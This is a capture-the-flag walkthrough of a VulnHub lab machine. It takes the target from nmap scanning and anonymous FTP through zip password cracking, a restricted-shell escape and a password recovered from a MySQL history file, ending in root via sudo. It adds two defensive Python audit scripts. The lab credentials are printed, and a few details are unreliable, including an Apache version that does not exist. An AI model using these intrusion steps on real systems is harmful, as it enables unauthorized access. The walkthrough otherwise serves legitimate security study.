https://www.vulnhub.com/entry/funbox-rookie,520/
Discovering the Target IP
- `sudo nmap -sn 192.168.122.0-255` to find live hosts on the subnet
- or `sudo netdiscover -P -i eth0 -r 192.168.122.1/24`
Scan Ports
- `nmap -p- 192.168.122.58` to scan all ports
- `nmap -p 21,22,80 -sC -sV 192.168.122.58` to get more information on the open ports found
Port 80
- `nikto -h http://192.168.122.58` to check for possible vulnerabilities
- the server is using Apache 2.6.49; search for possible CVEs or exploits, e.g. https://www.exploit-db.com/exploits/50383
Port 21
- `ftp 192.168.122.58` to access the FTP server; from the nmap scan we know that anonymous login is allowed, so use the username `anonymous` and an empty password
- once we are in the FTP server:
  - `ls -la` to show all files
  - `get <filename>` to download one file
  - `mget *` to download multiple or all files
  - `exit` to leave the FTP server
Cracking ZIP files
- we now have many zip files, but all of them are password protected. We can try John the Ripper to crack them:
  - `zip2john tom.zip > tom.txt` converts the zip into a hash file
  - `john tom.txt` cracks it using the default wordlist
  - `unzip tom.zip -d tom` with the password `iubire` to unzip it
- or we can try fcrackzip (Fast Zip password cracker):
  - `gzip -d /usr/share/wordlists/rockyou.txt.gz` to decompress the password list
  - `fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt catherine.zip` to crack it using the rockyou password list
  - `unzip catherine.zip -d catherine` to unzip it
Port 22
- `ssh tom@192.168.122.58 -i id_rsa` to SSH into the target machine as tom
Get out of rbash
- by default we land in a restricted shell
- `ssh tom@192.168.122.58 -i id_rsa -t "bash --noprofile"` to SSH straight into bash without the profile, or just run `bash -i`
- reference: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
Get user password
- now we are in tom's home directory; `ls -la` lists the files, and there is a hidden `.mysql_history` file
- open it; it contains the line `insert\040into\040support\040(tom,\040xx11yy22!);`
- in `(tom,\040xx11yy22!)` we can guess that `tom` is the username and `\040xx11yy22!` is the password, but `\040` is the octal escape for an ASCII space, so tom's password is `xx11yy22!`
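The walkthrough decodes `\040` by hand. The following added example (my own code, not part of the original writeup) does the decoding generically and, from a hygiene point of view, flags history statements that wrote literal values, since those are the ones that can leak a secret into a client history file. It assumes that the mysql client encodes characters as three-digit octal escapes, which the page shows for `\040`; the sample lines are constructed and modelled on the one the page found.

```python
import re

# Constructed sample of ~/.mysql_history content, modelled on the line found in
# the walkthrough. The client keeps one statement per line and encodes spaces
# as the octal escape \040 (assumption: every escape has the form \NNN).
SAMPLE_HISTORY = [
    r"insert\040into\040support\040(tom,\040xx11yy22!);",
    r"select\040*\040from\040support;",
    r"show\040tables;",
]

# A backslash followed by exactly three octal digits
OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")

# Statements that store literal values in a table; these may carry a secret
WRITES_LITERALS = re.compile(r"^\s*(insert|update|replace)\b", re.IGNORECASE)


def decode_history_line(line: str) -> str:
    """Replace every \\NNN octal escape with the character it encodes."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), line)


def find_statements_with_literals(lines):
    """Decode history lines and return the ones that wrote literal values.

    Such statements deserve review: a credential inserted in cleartext stays
    readable in the history file long after the database row was written.
    """
    decoded = [decode_history_line(line) for line in lines]
    return [stmt for stmt in decoded if WRITES_LITERALS.match(stmt)]


if __name__ == "__main__":
    for stmt in find_statements_with_literals(SAMPLE_HISTORY):
        print("review:", stmt)
```

Run against a real history file, the decoded output reads as the statements were originally typed; the check only points at statements worth a look, it does not decide what is a secret.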
Elevate Privilege
- now with tom's username and password, run `sudo -l` to list all commands that tom can run with sudo; it shows
User root may run the following commands on funbox2:
(ALL : ALL) ALL
- so we can just run `sudo bash` to open a root shell
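The `(ALL : ALL) ALL` specification is what turns a user password into root. As an added example (my own code, not from the original walkthrough), here is a small audit that parses sudoers-style user specifications and reports every non-root principal allowed to run any command as root or as ALL, which is the least-privilege check a defender would run on a box like this. The sudoers content is a constructed sample; only the `(ALL : ALL) ALL` specification and the host name funbox2 come from the page.

```python
import re

# Constructed sample sudoers content (not from the target machine). The tom line
# carries the same specification the walkthrough saw in `sudo -l` on funbox2:
# (ALL : ALL) ALL, i.e. any command, as any user and any group.
SAMPLE_SUDOERS = """\
# who  hosts=(runas_user:runas_group) [tags:] commands
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%admin          ALL=(ALL) ALL
tom             ALL=(ALL : ALL) ALL
backup          ALL=(root) NOPASSWD: /usr/bin/rsync
www-data        ALL=(ALL) NOPASSWD: ALL
"""

# One user specification: who  hosts = (runas) commands
SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
# Leading tags such as NOPASSWD: or SETENV: that precede the command list
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")


def parse_sudoers(text):
    """Return the user specifications in a sudoers file as dicts."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC.match(line)
        if m:
            entries.append({
                "who": m["who"],
                "runas": m["runas"],
                "nopasswd": "NOPASSWD:" in m["cmds"],
                "cmds": TAGS.sub("", m["cmds"]).strip(),
            })
    return entries


def unrestricted_entries(entries):
    """Non-root principals that may run ALL commands as root (or as ALL).

    Returns (who, nopasswd) pairs; NOPASSWD entries are the more urgent ones
    because they do not even require the account's password.
    """
    flagged = []
    for e in entries:
        # Without a (runas) clause sudo defaults to running as root.
        runas_user = e["runas"].split(":")[0].strip() if e["runas"] else "root"
        if e["who"] != "root" and runas_user in ("root", "ALL") and e["cmds"] == "ALL":
            flagged.append((e["who"], e["nopasswd"]))
    return flagged


if __name__ == "__main__":
    for who, nopasswd in unrestricted_entries(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who}: full root via sudo{' without a password' if nopasswd else ''}")
```

The parser handles the common single-line form only (no aliases, no line continuations); on a real host, feed it the output of `visudo -c` checked files or `sudo -l` per account and treat every flagged principal as root-equivalent when assessing a leaked password.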
Capture the Flag
- navigate to `/root`
- get `flag.txt`